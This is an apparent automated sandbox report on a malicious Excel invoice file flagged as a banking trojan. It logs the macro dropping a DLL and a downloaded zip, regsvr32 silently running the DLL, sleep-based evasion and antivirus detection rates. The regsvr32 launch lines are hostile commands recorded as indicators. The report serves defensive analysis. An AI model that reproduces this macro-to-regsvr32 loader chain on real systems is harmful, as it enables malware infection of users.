Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0089ACD0	4_2_0089ACD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008AA0D0	4_2_008AA0D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B1020	4_2_008B1020
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008AD030	4_2_008AD030
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008AD980	4_2_008AD980
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008BD180	4_2_008BD180
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008AC590	4_2_008AC590
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0089F9A0	4_2_0089F9A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008AFDD0	4_2_008AFDD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B89F0	4_2_008B89F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B71F0	4_2_008B71F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008A7564	4_2_008A7564
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00891570	4_2_00891570
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008AAE80	4_2_008AAE80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008A8AB0	4_2_008A8AB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B1EB0	4_2_008B1EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B26B0	4_2_008B26B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B3EC0	4_2_008B3EC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008BFA10	4_2_008BFA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00896AD0	4_2_00896AD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008A96D0	4_2_008A96D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008AF6E0	4_2_008AF6E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008AB6F0	4_2_008AB6F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008A8EF0	4_2_008A8EF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B62F0	4_2_008B62F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_0089CA10	4_2_0089CA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008BFA10	4_2_008BFA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B0220	4_2_008B0220
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008BD620	4_2_008BD620
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B1240	4_2_008B1240
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008AA660	4_2_008AA660
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B7660	4_2_008B7660
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B2E60	4_2_008B2E60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_00899E70	4_2_00899E70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008A9E70	4_2_008A9E70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008A67C8	4_2_008A67C8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008A83C0	4_2_008A83C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008A7FC0	4_2_008A7FC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B7FC0	4_2_008B7FC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008AE3F0	4_2_008AE3F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B3B00	4_2_008B3B00
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B9B10	4_2_008B9B10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008B1730	4_2_008B1730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008ABF50	4_2_008ABF50
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_008A5B60	4_2_008A5B60

Source: Inv0209966048-20210111075675.xls	OLE, VBA macro line: Private Sub view_1_a_Layout(ByVal Index As Long)
Source: VBA code instrumentation	OLE, VBA macro: Module Sheet1, Function view_1_a_Layout			Name: view_1_a_Layout

Source: Inv0209966048-20210111075675.xls

OLE indicator, VBA macros: true

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1488

Source: w80l82r[1].zip.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: w80l82r[1].zip.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: w80l82r[1].zip.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: w80l82r[1].zip.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lwjmdgav.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lwjmdgav.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lwjmdgav.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lwjmdgav.dll.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: DWWIN.EXE, 00000007.00000002.2260615326.0000000003250000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.bank.expl.evad.winXLS@9/18@1/5

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT

Jump to behavior

Source: C:\Windows\System32\DWWIN.EXE

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2028

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE407.tmp

Jump to behavior

Source: Inv0209966048-20210111075675.xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Inv0209966048-20210111075675.xls	Virustotal: Detection: 45%
Source: Inv0209966048-20210111075675.xls	Metadefender: Detection: 16%
Source: Inv0209966048-20210111075675.xls	ReversingLabs: Detection: 34%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll.
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll.
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1488
Source: unknown	Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1488
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll.	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1488	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll.	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1488	Jump to behavior

Source: C:\Windows\System32\DWWIN.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{713AACC8-3B71-435C-A3A1-BE4E53621AB1}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,

4_2_10002140

Source: w80l82r[1].zip.0.dr	Static PE information: section name: .rdata3
Source: w80l82r[1].zip.0.dr	Static PE information: section name: .2
Source: w80l82r[1].zip.0.dr	Static PE information: section name: .rdata2
Source: w80l82r[1].zip.0.dr	Static PE information: section name: .text4
Source: lwjmdgav.dll.0.dr	Static PE information: section name: .rdata3
Source: lwjmdgav.dll.0.dr	Static PE information: section name: .2
Source: lwjmdgav.dll.0.dr	Static PE information: section name: .rdata2
Source: lwjmdgav.dll.0.dr	Static PE information: section name: .text4

Source: unknown

Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\lwjmdgav.dll.

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000400A push esi; retf	4_2_1000401D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10010810 pushfd ; retf	4_2_1001084E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000D856 push ebp; retf	4_2_1000D85E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000E8F3 pushad ; iretd	4_2_1000E8F4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10002140 push ecx; ret	4_2_100021B6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001CD9B push esp; retf	4_2_1001CDB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000C265 push 588A19FDh; iretd	4_2_1000C278
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10020A73 push edx; iretd	4_2_10020A9C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000FEBF push eax; iretd	4_2_1000FEC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000FEFA push 00000000h; iretd	4_2_1000FF10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10023EFF push eax; iretd	4_2_10023F64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000C304 push 588A1BCDh; iretd	4_2_1000C314
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10010307 push esp; retf	4_2_10010308
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000CF15 push 0000002Dh; iretd	4_2_1000CF1C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001DB23 push eax; iretd	4_2_1001DB34
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10020B27 push eax; iretd	4_2_10020B28
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000DFC7 pushad ; iretd	4_2_1000DFC8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10023FEB push edx; ret	4_2_10024001
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100107FB pushfd ; retf	4_2_1001084E

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\lwjmdgav.dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\w80l82r[1].zip			Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\w80l82r[1].zip

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\DWWIN.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,

4_2_00895150

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\w80l82r[1].zip

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2932	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -405000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -528000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -334000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -337000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -720000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -700000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -417000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -638000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -396000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -705000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -123000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -279000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -328000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -504000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -698000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -1036000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -507000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -602000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -348000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -917000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -684000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -486000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -254000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -278000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -804000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -513000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -692000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -304000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -1120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -744000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -326000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -532000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -358000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -318000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -468000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -316000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -272000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -642000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -715000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -411000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -314000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -153000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -255000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -588000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -525000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -292000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -310000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -712000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -290000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -477000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -453000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -351000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -512000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -608000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -292000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -327000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -532000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -552000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -328000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -568000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -650000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -488000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -331000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -244000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -387000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -265000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -320000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -512000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -604000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -483000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -322000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -245000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 912	Thread sleep time: -332000s >= -30000s	Jump to behavior
